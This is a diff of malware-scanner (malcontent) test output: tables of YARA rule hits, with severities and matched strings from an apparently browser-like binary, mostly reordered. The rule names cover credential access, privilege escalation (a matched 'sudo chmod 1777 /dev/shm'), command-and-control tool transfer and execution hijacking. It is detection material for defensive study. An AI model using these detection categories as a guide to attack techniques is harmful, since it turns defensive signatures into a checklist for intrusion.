[net/url](https://github.com/search?q=net%2Furl&type=code)
[openURL](https://github.com/search?q=openURL&type=code)
[openUrl](https://github.com/search?q=openUrl&type=code)
[request(url,](https://github.com/search?q=request%28url%2C&type=code) | +| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[request(url,](https://github.com/search?q=request%28url%2C&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code)
[openURL](https://github.com/search?q=openURL&type=code)
[openUrl](https://github.com/search?q=openUrl&type=code) | | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | -| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code) | -| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptProtocol](https://github.com/search?q=interceptProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [INVALID SHARED ON CONSTRUCTOR!!!](https://github.com/search?q=INVALID+SHARED+ON+CONSTRUCTOR%21%21%21&type=code)
[Could not format log message !!](https://github.com/search?q=Could+not+format+log+message+%21%21&type=code)
[INVALID CONSTRUCTOR!!!](https://github.com/search?q=INVALID+CONSTRUCTOR%21%21%21&type=code)
[!!!!!!!!!!!!!!!!](https://github.com/search?q=%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21%21&type=code)
[ACHIJNPRU !!](https://github.com/search?q=ACHIJNPRU+++%21%21&type=code)
[INVALID MAP!!!](https://github.com/search?q=INVALID+MAP%21%21%21&type=code)
[11366 !!](https://github.com/search?q=11366++++++%21%21&type=code)
[12366 !!](https://github.com/search?q=12366+++++%21%21&type=code)
[AAHHKKO !!](https://github.com/search?q=AAHHKKO+++%21%21&type=code)
[ABHH !!](https://github.com/search?q=ABHH+++++%21%21&type=code)
[FFHHL !!](https://github.com/search?q=FFHHL+++%21%21&type=code)
[0 !!!](https://github.com/search?q=0+++++%21%21%21&type=code)
[return !!](https://github.com/search?q=return+%21%21&type=code)
[GG !!](https://github.com/search?q=GG++++%21%21&type=code) | +| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [interceptor_url_loader_throttle](https://github.com/search?q=interceptor_url_loader_throttle&type=code)
[interceptBufferProtocol](https://github.com/search?q=interceptBufferProtocol&type=code)
[interceptStreamProtocol](https://github.com/search?q=interceptStreamProtocol&type=code)
[interceptStringProtocol](https://github.com/search?q=interceptStringProtocol&type=code)
[interceptFileProtocol](https://github.com/search?q=interceptFileProtocol&type=code)
[interceptHttpProtocol](https://github.com/search?q=interceptHttpProtocol&type=code)
[interceptor_info_map](https://github.com/search?q=interceptor_info_map&type=code)
[interceptProtocol](https://github.com/search?q=interceptProtocol&type=code)
[interceptResponse](https://github.com/search?q=interceptResponse&type=code)
[interceptionStage](https://github.com/search?q=interceptionStage&type=code)
[interceptionId](https://github.com/search?q=interceptionId&type=code)
[intercepting](https://github.com/search?q=intercepting&type=code)
[interceptors](https://github.com/search?q=interceptors&type=code)
[intercepted](https://github.com/search?q=intercepted&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | | LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscate_location_parse_error](https://github.com/search?q=obfuscate_location_parse_error&type=code)
[obfuscated_field_name](https://github.com/search?q=obfuscated_field_name&type=code)
[obfuscated_file_util](https://github.com/search?q=obfuscated_file_util&type=code)
[obfuscated_name](https://github.com/search?q=obfuscated_name&type=code) | -| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code)
[http://](http://)
[https://](https://)
[x86_64](https://github.com/search?q=x86_64&type=code) | -| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [AccountPasswordsConsent](https://github.com/search?q=AccountPasswordsConsent&type=code)
[ChromePasswordManagerClient](https://github.com/search?q=ChromePasswordManagerClient&type=code)
[GaiaPasswordCaptured](https://github.com/search?q=GaiaPasswordCaptured&type=code)
[GaiaPasswordReuse](https://github.com/search?q=GaiaPasswordReuse&type=code)
[Invalid password pattern](https://github.com/search?q=Invalid+password+pattern&type=code)
[PasswordGroupData](https://github.com/search?q=PasswordGroupData&type=code)
[PasswordGroupElementData](https://github.com/search?q=PasswordGroupElementData&type=code)
[PasswordH](https://github.com/search?q=PasswordH&type=code)
[PasswordIssues](https://github.com/search?q=PasswordIssues&type=code)
[PasswordReuseDetected](https://github.com/search?q=PasswordReuseDetected&type=code)
[PasswordReuseLookup](https://github.com/search?q=PasswordReuseLookup&type=code)
[PasswordReveal](https://github.com/search?q=PasswordReveal&type=code)
[PasswordSpecificsData](https://github.com/search?q=PasswordSpecificsData&type=code)
[PasswordStrongLabel](https://github.com/search?q=PasswordStrongLabel&type=code)
[SetPasswordFunc](https://github.com/search?q=SetPasswordFunc&type=code)
[Username and password are expected to](https://github.com/search?q=Username+and+password+are+expected+to&type=code)
[a username and password](https://github.com/search?q=a+username+and+password&type=code)
[accessibilityPasswordValuesEnabled](https://github.com/search?q=accessibilityPasswordValuesEnabled&type=code)
[bPassword](https://github.com/search?q=bPassword&type=code)
[called on a passwordless request](https://github.com/search?q=called+on+a+passwordless+request&type=code)
[challengePassword](https://github.com/search?q=challengePassword&type=code)
[current-password](https://github.com/search?q=current-password&type=code)
[fade-out-password](https://github.com/search?q=fade-out-password&type=code)
[for password](https://github.com/search?q=for+password&type=code)
[generated a new password](https://github.com/search?q=generated+a+new+password&type=code)
[get password](https://github.com/search?q=get+password&type=code)
[getPasswordComplete](https://github.com/search?q=getPasswordComplete&type=code)
[id-PasswordBasedMAC](https://github.com/search?q=id-PasswordBasedMAC&type=code)
[input-password](https://github.com/search?q=input-password&type=code)
[kPassword](https://github.com/search?q=kPassword&type=code)
[like a password](https://github.com/search?q=like+a+password&type=code)
[new-password](https://github.com/search?q=new-password&type=code)
[or PasswordCredentialData](https://github.com/search?q=or+PasswordCredentialData&type=code)
[password based MAC](https://github.com/search?q=password+based+MAC&type=code)
[password is too large](https://github.com/search?q=password+is+too+large&type=code)
[password text](https://github.com/search?q=password+text&type=code)
[password-change](https://github.com/search?q=password-change&type=code)
[password-manager](https://github.com/search?q=password-manager&type=code)
[password-protection](https://github.com/search?q=password-protection&type=code)
[password-reveal](https://github.com/search?q=password-reveal&type=code)
[password-store](https://github.com/search?q=password-store&type=code)
[password-strong-label](https://github.com/search?q=password-strong-label&type=code)
[passwordChar](https://github.com/search?q=passwordChar&type=code)
[passwordDialogTitle](https://github.com/search?q=passwordDialogTitle&type=code)
[passwordEchoEnabled](https://github.com/search?q=passwordEchoEnabled&type=code)
[passwordEdit](https://github.com/search?q=passwordEdit&type=code)
[passwordInvalid](https://github.com/search?q=passwordInvalid&type=code)
[passwordPrompt](https://github.com/search?q=passwordPrompt&type=code)
[passwordSubmit](https://github.com/search?q=passwordSubmit&type=code)
[readPassword](https://github.com/search?q=readPassword&type=code)
[reveal-password](https://github.com/search?q=reveal-password&type=code)
[secret_password_clear_sync](https://github.com/search?q=secret_password_clear_sync&type=code)
[secret_password_store_sync](https://github.com/search?q=secret_password_store_sync&type=code)
[set password](https://github.com/search?q=set+password&type=code)
[such as passwords](https://github.com/search?q=such+as+passwords&type=code)
[to deserialize password_string](https://github.com/search?q=to+deserialize+password_string&type=code)
[userPassword](https://github.com/search?q=userPassword&type=code)
[username or password](https://github.com/search?q=username+or+password&type=code)
[writePassword](https://github.com/search?q=writePassword&type=code) | -| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [PRIVATE_KEY](https://github.com/search?q=PRIVATE_KEY&type=code)
[privateKey](https://github.com/search?q=privateKey&type=code)
[private_key](https://github.com/search?q=private_key&type=code) | -| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code)
[crypto/aes](https://github.com/search?q=crypto%2Faes&type=code) | -| LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [AeadEncryptDecrypt](https://github.com/search?q=AeadEncryptDecrypt&type=code)
[AesCbcEncryptDecrypt](https://github.com/search?q=AesCbcEncryptDecrypt&type=code)
[CommonEncryptDecrypt](https://github.com/search?q=CommonEncryptDecrypt&type=code)
[ContentDecryptionModuleClient](https://github.com/search?q=ContentDecryptionModuleClient&type=code)
[CreateContentDecryptionModule](https://github.com/search?q=CreateContentDecryptionModule&type=code)
[Creation of DecryptConfig failed](https://github.com/search?q=Creation+of+DecryptConfig+failed&type=code)
[DecryptAndDecodeAudio](https://github.com/search?q=DecryptAndDecodeAudio&type=code)
[DecryptAndDecodeVideo](https://github.com/search?q=DecryptAndDecodeVideo&type=code)
[DecryptPendingBuffer](https://github.com/search?q=DecryptPendingBuffer&type=code)
[Decrypted a 0](https://github.com/search?q=Decrypted+a+0&type=code)
[DecryptedWithEmptyKey](https://github.com/search?q=DecryptedWithEmptyKey&type=code)
[DecryptingAudioDecoder](https://github.com/search?q=DecryptingAudioDecoder&type=code)
[DecryptingVideoDecoder](https://github.com/search?q=DecryptingVideoDecoder&type=code)
[Decryption failed](https://github.com/search?q=Decryption+failed&type=code)
[Decryption is not avail](https://github.com/search?q=Decryption+is+not+avail&type=code)
[Decryption succeeded af](https://github.com/search?q=Decryption+succeeded+af&type=code)
[DoDecryptReply](https://github.com/search?q=DoDecryptReply&type=code)
[For a Content Decryption Module](https://github.com/search?q=For+a+Content+Decryption+Module&type=code)
[GetFrameDecryptor](https://github.com/search?q=GetFrameDecryptor&type=code)
[Hardware Secure Decryption is disabled](https://github.com/search?q=Hardware+Secure+Decryption+is+disabled&type=code)
[HardwareSecureDecryptionExperiment](https://github.com/search?q=HardwareSecureDecryptionExperiment&type=code)
[MojoDecryptorService](https://github.com/search?q=MojoDecryptorService&type=code)
[OnDecryptingDemuxerStream](https://github.com/search?q=OnDecryptingDemuxerStream&type=code)
[Selected DecryptingDemuxerStream](https://github.com/search?q=Selected+DecryptingDemuxerStream&type=code)
[Setting FrameDecryptor](https://github.com/search?q=Setting+FrameDecryptor&type=code)
[WaitingForDecryptionKey](https://github.com/search?q=WaitingForDecryptionKey&type=code)
[_privateDecrypt](https://github.com/search?q=_privateDecrypt&type=code)
[_publicDecrypt](https://github.com/search?q=_publicDecrypt&type=code)
[ause of SetFrameDecryptor](https://github.com/search?q=ause+of+SetFrameDecryptor&type=code)
[const privateDecrypt](https://github.com/search?q=const+privateDecrypt&type=code)
[const publicDecrypt](https://github.com/search?q=const+publicDecrypt&type=code)
[e to set ContentDecryptionModule object](https://github.com/search?q=e+to+set+ContentDecryptionModule+object&type=code)
[existing ContentDecryptionModule object](https://github.com/search?q=existing+ContentDecryptionModule+object&type=code)
[kDecryptError](https://github.com/search?q=kDecryptError&type=code)
[kIsAudioDecryptingDemuxerStream](https://github.com/search?q=kIsAudioDecryptingDemuxerStream&type=code)
[kIsVideoDecryptingDemuxerStream](https://github.com/search?q=kIsVideoDecryptingDemuxerStream&type=code)
[kWebCryptoCipherDecrypt](https://github.com/search?q=kWebCryptoCipherDecrypt&type=code)
[ketsReceivedWithDecrypter](https://github.com/search?q=ketsReceivedWithDecrypter&type=code) | +| LOW | [c2/tool_transfer/arch](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/tool_transfer/arch.yara#arch_ref) | references a specific architecture | [https://](https://)
[http://](http://)
[x86_64](https://github.com/search?q=x86_64&type=code)
[amd64](https://github.com/search?q=amd64&type=code)
[arm64](https://github.com/search?q=arm64&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Username and password are expected to](https://github.com/search?q=Username+and+password+are+expected+to&type=code)
[accessibilityPasswordValuesEnabled](https://github.com/search?q=accessibilityPasswordValuesEnabled&type=code)
[called on a passwordless request](https://github.com/search?q=called+on+a+passwordless+request&type=code)
[to deserialize password_string](https://github.com/search?q=to+deserialize+password_string&type=code)
[ChromePasswordManagerClient](https://github.com/search?q=ChromePasswordManagerClient&type=code)
[secret_password_clear_sync](https://github.com/search?q=secret_password_clear_sync&type=code)
[secret_password_store_sync](https://github.com/search?q=secret_password_store_sync&type=code)
[or PasswordCredentialData](https://github.com/search?q=or+PasswordCredentialData&type=code)
[Invalid password pattern](https://github.com/search?q=Invalid+password+pattern&type=code)
[PasswordGroupElementData](https://github.com/search?q=PasswordGroupElementData&type=code)
[generated a new password](https://github.com/search?q=generated+a+new+password&type=code)
[AccountPasswordsConsent](https://github.com/search?q=AccountPasswordsConsent&type=code)
[a username and password](https://github.com/search?q=a+username+and+password&type=code)
[PasswordReuseDetected](https://github.com/search?q=PasswordReuseDetected&type=code)
[PasswordSpecificsData](https://github.com/search?q=PasswordSpecificsData&type=code)
[password is too large](https://github.com/search?q=password+is+too+large&type=code)
[password-strong-label](https://github.com/search?q=password-strong-label&type=code)
[GaiaPasswordCaptured](https://github.com/search?q=GaiaPasswordCaptured&type=code)
[username or password](https://github.com/search?q=username+or+password&type=code)
[PasswordReuseLookup](https://github.com/search?q=PasswordReuseLookup&type=code)
[PasswordStrongLabel](https://github.com/search?q=PasswordStrongLabel&type=code)
[getPasswordComplete](https://github.com/search?q=getPasswordComplete&type=code)
[id-PasswordBasedMAC](https://github.com/search?q=id-PasswordBasedMAC&type=code)
[password-protection](https://github.com/search?q=password-protection&type=code)
[passwordDialogTitle](https://github.com/search?q=passwordDialogTitle&type=code)
[passwordEchoEnabled](https://github.com/search?q=passwordEchoEnabled&type=code)
[password based MAC](https://github.com/search?q=password+based+MAC&type=code)
[GaiaPasswordReuse](https://github.com/search?q=GaiaPasswordReuse&type=code)
[PasswordGroupData](https://github.com/search?q=PasswordGroupData&type=code)
[challengePassword](https://github.com/search?q=challengePassword&type=code)
[fade-out-password](https://github.com/search?q=fade-out-password&type=code)
[such as passwords](https://github.com/search?q=such+as+passwords&type=code)
[current-password](https://github.com/search?q=current-password&type=code)
[password-manager](https://github.com/search?q=password-manager&type=code)
[SetPasswordFunc](https://github.com/search?q=SetPasswordFunc&type=code)
[like a password](https://github.com/search?q=like+a+password&type=code)
[password-change](https://github.com/search?q=password-change&type=code)
[password-reveal](https://github.com/search?q=password-reveal&type=code)
[passwordInvalid](https://github.com/search?q=passwordInvalid&type=code)
[reveal-password](https://github.com/search?q=reveal-password&type=code)
[PasswordIssues](https://github.com/search?q=PasswordIssues&type=code)
[PasswordReveal](https://github.com/search?q=PasswordReveal&type=code)
[input-password](https://github.com/search?q=input-password&type=code)
[password-store](https://github.com/search?q=password-store&type=code)
[passwordPrompt](https://github.com/search?q=passwordPrompt&type=code)
[passwordSubmit](https://github.com/search?q=passwordSubmit&type=code)
[password text](https://github.com/search?q=password+text&type=code)
[writePassword](https://github.com/search?q=writePassword&type=code)
[for password](https://github.com/search?q=for+password&type=code)
[get password](https://github.com/search?q=get+password&type=code)
[new-password](https://github.com/search?q=new-password&type=code)
[passwordChar](https://github.com/search?q=passwordChar&type=code)
[passwordEdit](https://github.com/search?q=passwordEdit&type=code)
[readPassword](https://github.com/search?q=readPassword&type=code)
[set password](https://github.com/search?q=set+password&type=code)
[userPassword](https://github.com/search?q=userPassword&type=code)
[PasswordH](https://github.com/search?q=PasswordH&type=code)
[bPassword](https://github.com/search?q=bPassword&type=code)
[kPassword](https://github.com/search?q=kPassword&type=code) | +| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [PRIVATE_KEY](https://github.com/search?q=PRIVATE_KEY&type=code)
[private_key](https://github.com/search?q=private_key&type=code)
[privateKey](https://github.com/search?q=privateKey&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [crypto/aes](https://github.com/search?q=crypto%2Faes&type=code)
[AES](https://github.com/search?q=AES&type=code) | +| LOW | [crypto/decrypt](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/decrypt.yara#decrypt) | decrypts data | [e to set ContentDecryptionModule object](https://github.com/search?q=e+to+set+ContentDecryptionModule+object&type=code)
[existing ContentDecryptionModule object](https://github.com/search?q=existing+ContentDecryptionModule+object&type=code)
[Hardware Secure Decryption is disabled](https://github.com/search?q=Hardware+Secure+Decryption+is+disabled&type=code)
[HardwareSecureDecryptionExperiment](https://github.com/search?q=HardwareSecureDecryptionExperiment&type=code)
[Creation of DecryptConfig failed](https://github.com/search?q=Creation+of+DecryptConfig+failed&type=code)
[Selected DecryptingDemuxerStream](https://github.com/search?q=Selected+DecryptingDemuxerStream&type=code)
[For a Content Decryption Module](https://github.com/search?q=For+a+Content+Decryption+Module&type=code)
[kIsAudioDecryptingDemuxerStream](https://github.com/search?q=kIsAudioDecryptingDemuxerStream&type=code)
[kIsVideoDecryptingDemuxerStream](https://github.com/search?q=kIsVideoDecryptingDemuxerStream&type=code)
[ContentDecryptionModuleClient](https://github.com/search?q=ContentDecryptionModuleClient&type=code)
[CreateContentDecryptionModule](https://github.com/search?q=CreateContentDecryptionModule&type=code)
[OnDecryptingDemuxerStream](https://github.com/search?q=OnDecryptingDemuxerStream&type=code)
[ause of SetFrameDecryptor](https://github.com/search?q=ause+of+SetFrameDecryptor&type=code)
[ketsReceivedWithDecrypter](https://github.com/search?q=ketsReceivedWithDecrypter&type=code)
[Decryption is not avail](https://github.com/search?q=Decryption+is+not+avail&type=code)
[Decryption succeeded af](https://github.com/search?q=Decryption+succeeded+af&type=code)
[WaitingForDecryptionKey](https://github.com/search?q=WaitingForDecryptionKey&type=code)
[kWebCryptoCipherDecrypt](https://github.com/search?q=kWebCryptoCipherDecrypt&type=code)
[DecryptingAudioDecoder](https://github.com/search?q=DecryptingAudioDecoder&type=code)
[DecryptingVideoDecoder](https://github.com/search?q=DecryptingVideoDecoder&type=code)
[Setting FrameDecryptor](https://github.com/search?q=Setting+FrameDecryptor&type=code)
[DecryptAndDecodeAudio](https://github.com/search?q=DecryptAndDecodeAudio&type=code)
[DecryptAndDecodeVideo](https://github.com/search?q=DecryptAndDecodeVideo&type=code)
[DecryptedWithEmptyKey](https://github.com/search?q=DecryptedWithEmptyKey&type=code)
[AesCbcEncryptDecrypt](https://github.com/search?q=AesCbcEncryptDecrypt&type=code)
[CommonEncryptDecrypt](https://github.com/search?q=CommonEncryptDecrypt&type=code)
[DecryptPendingBuffer](https://github.com/search?q=DecryptPendingBuffer&type=code)
[MojoDecryptorService](https://github.com/search?q=MojoDecryptorService&type=code)
[const privateDecrypt](https://github.com/search?q=const+privateDecrypt&type=code)
[const publicDecrypt](https://github.com/search?q=const+publicDecrypt&type=code)
[AeadEncryptDecrypt](https://github.com/search?q=AeadEncryptDecrypt&type=code)
[Decryption failed](https://github.com/search?q=Decryption+failed&type=code)
[GetFrameDecryptor](https://github.com/search?q=GetFrameDecryptor&type=code)
[_privateDecrypt](https://github.com/search?q=_privateDecrypt&type=code)
[DoDecryptReply](https://github.com/search?q=DoDecryptReply&type=code)
[_publicDecrypt](https://github.com/search?q=_publicDecrypt&type=code)
[Decrypted a 0](https://github.com/search?q=Decrypted+a+0&type=code)
[kDecryptError](https://github.com/search?q=kDecryptError&type=code) | | LOW | [crypto/ecdsa](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ecdsa.yara#crypto_ecdsa) | Uses the Go crypto/ecdsa library | [crypto/ecdsa](https://github.com/search?q=crypto%2Fecdsa&type=code) | | LOW | [crypto/ed25519](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/ed25519.yara#ed25519) | Elliptic curve algorithm used by TLS and SSH | [ed25519](https://github.com/search?q=ed25519&type=code) | -| LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [Public key](https://github.com/search?q=Public+key&type=code)
[Public-key](https://github.com/search?q=Public-key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[public-key](https://github.com/search?q=public-key&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | -| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [TLS13](https://github.com/search?q=TLS13&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code)
[require('tls')](https://github.com/search?q=require%28%27tls%27%29&type=code) | +| LOW | [crypto/public_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/public_key.yara#public_key) | references a 'public key' | [Public key](https://github.com/search?q=Public+key&type=code)
[Public-key](https://github.com/search?q=Public-key&type=code)
[public key](https://github.com/search?q=public+key&type=code)
[public-key](https://github.com/search?q=public-key&type=code)
[public_key](https://github.com/search?q=public_key&type=code)
[PublicKey](https://github.com/search?q=PublicKey&type=code)
[publicKey](https://github.com/search?q=publicKey&type=code)
[publickey](https://github.com/search?q=publickey&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [require('tls')](https://github.com/search?q=require%28%27tls%27%29&type=code)
[TLSVersion](https://github.com/search?q=TLSVersion&type=code)
[crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code)
[TLS13](https://github.com/search?q=TLS13&type=code) | | LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | | LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | | LOW | [data/compression/lzma](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/lzma.yara#lzma) | [works with lzma files](https://en.wikipedia.org/wiki/Lempel%E2%80%93Ziv%E2%80%93Markov_chain_algorithm) | [lzma](https://github.com/search?q=lzma&type=code) | | LOW | [data/compression/zlib](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zlib.yara#zlib) | uses zlib | [zlib](https://github.com/search?q=zlib&type=code) | -| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [(/](https://github.com/search?q=%28%B5%2F%FD&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | +| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [zstd](https://github.com/search?q=zstd&type=code) | | LOW | [data/embedded/pem_certificate](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/embedded/embedded-pem-certificate.yara#begin_cert) | Contains embedded PEM certificate | [--BEGIN CERTIFICATE--](https://github.com/search?q=--BEGIN+CERTIFICATE--&type=code) | | LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | | LOW | [data/encoding/json_decode](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/json-decode.yara#jsondecode) | Decodes JSON messages | [JSON.parse](https://github.com/search?q=JSON.parse&type=code) | @@ -121,39 +121,39 @@ | LOW | [discover/network/interface](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/network/interface.yara#bsd_if) | get network interfaces by name or index | [if_indextoname](https://github.com/search?q=if_indextoname&type=code)
[if_nametoindex](https://github.com/search?q=if_nametoindex&type=code) | | LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | | LOW | [discover/system/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/hostname.yara#gethostname) | [get computer host name](https://man7.org/linux/man-pages/man2/sethostname.2.html) | [gethostname](https://github.com/search?q=gethostname&type=code) | -| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [HOME](https://github.com/search?q=HOME&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | -| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [ENV](https://github.com/search?q=ENV&type=code)
[USER](https://github.com/search?q=USER&type=code)
[environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [discover/user/HOME](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/HOME.yara#HOME) | [Looks up the HOME directory for the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [getenv](https://github.com/search?q=getenv&type=code)
[HOME](https://github.com/search?q=HOME&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [environ](https://github.com/search?q=environ&type=code)
[getenv](https://github.com/search?q=getenv&type=code)
[USER](https://github.com/search?q=USER&type=code)
[ENV](https://github.com/search?q=ENV&type=code) | | LOW | [evasion/hijack_execution/LD_LIBRARY_PATH](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/hijack_execution/LD_LIBRARY_PATH.yara#ld_library_path) | ld library path | [LD_LIBRARY_PATH](https://github.com/search?q=LD_LIBRARY_PATH&type=code) | -| LOW | [exec/conditional/LANG](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/conditional/LANG.yara#LANG_getenv) | Looks up language of current user | [LANG](https://github.com/search?q=LANG&type=code)
